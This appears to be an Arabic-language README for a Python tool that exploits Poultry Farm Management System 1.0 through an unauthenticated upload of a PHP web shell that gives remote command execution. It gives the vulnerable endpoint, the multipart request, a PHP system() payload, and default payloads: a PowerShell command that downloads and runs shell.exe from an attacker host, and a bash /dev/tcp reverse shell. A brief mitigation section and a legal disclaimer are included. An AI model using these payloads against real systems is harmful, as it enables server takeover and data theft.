
استغلال بايثون لتنفيذ تعليمات برمجية عن بُعد غير مصادق عليه عبر رفع ملف في نظام إدارة مزرعة الدواجن الإصدار 1.0. يقوم برفع قذائف PHP لتنفيذ أوامر نظام عشوائية على الأهداف الضعيفة.
رفع ملفات غير موثوق دون مصادقة مع تنفيذ أوامر عن بعد
يحتوي نظام إدارة مزرعة الدواجن الإصدار 1.0 على ثغرة أمنية حرجة في وظيفة رفع المنتجات. يفشل التطبيق في التحقق من صحة ملفات الرفع وتنقيتها بشكل صحيح، مما يسمح للمهاجمين برفع ملفات PHP متنكرة في صورة صور منتجات. يمكن تنفيذ ملفات PHP المرفوعة هذه لتحقيق تنفيذ أوامر عن بعد.
POST /paultry/farm/product.php أو POST /farm/product.php
يمكن استغلال الثغرة من خلال:
requestscolorama (للإخراج الملون)pip install requests colorama
أو تثبيت جميع التبعيات:
pip install -r requirements.txt
شغّل البرنامج النصي بشكل تفاعلي:
python exploit.py
سيطلب منك البرنامج النصي:
==================================================
أداة رفع الباب الخلفي التفاعلية
==================================================
أدخل عنوان IP الهدف: 192.168.1.100
أدخل المنفذ الهدف (الافتراضي: 80): 8080
أدخل الأمر المراد تنفيذه (الافتراضي: حمولة باورشيل):
الأمر: whoami
==================================================
التأكيد
==================================================
عنوان URL الهدف: http://192.168.1.100:8080
الأمر: whoami
هل تريد المتابعة؟ (نعم/لا): نعم
✅ إدخال تفاعلي - يطلب IP والمنفذ والأوامر المخصصة
✅ قيم افتراضية - افتراضيات مناسبة للراحة
✅ إخراج ملون - إخراج طرفية ملون سهل القراءة
✅ خطوة تأكيد - تحقق من الإعدادات قبل التنفيذ
✅ معالجة الأخطاء - رسائل خطأ مهذبة للطلبات الفاشلة
✅ أوامر مرنة - دعم لأي أمر شل أو حمولة باورشيل
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/system()POST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('COMMAND_HERE');?>
تم اختبار الاستغلال على:
⚠️ تحذير قانوني
هذه الأداة مقدمة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
تحديث البرامج - تطبيق التصحيحات الأمنية إذا كانت متاحة
التحقق من صحة رفع الملفات
التكوين
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
التحكم في الوصول
المراقبة
خطأ: تم رفض الاتصال
الحل: تحقق من صحة IP الهدف والمنفذ وأن التطبيق قيد التشغيل
خطأ: فشل رفع الشل. رمز الحالة: 404
الحل: قد يختلف مسار نقطة النهاية. المسارات الشائعة: /farm/، /paultry/farm/
خطأ: إخراج الأمر فارغ
الحل: قد يكون تنفيذ PHP معطلاً أو لم يتم رفع الملف بشكل صحيح
للاستفسارات أو المشكلات أو التحسينات، راجع مستودع GitHub أو صفحة Exploit-DB.
آخر تحديث: ديسمبر 2024
الحالة: تم التحقق منه واختباره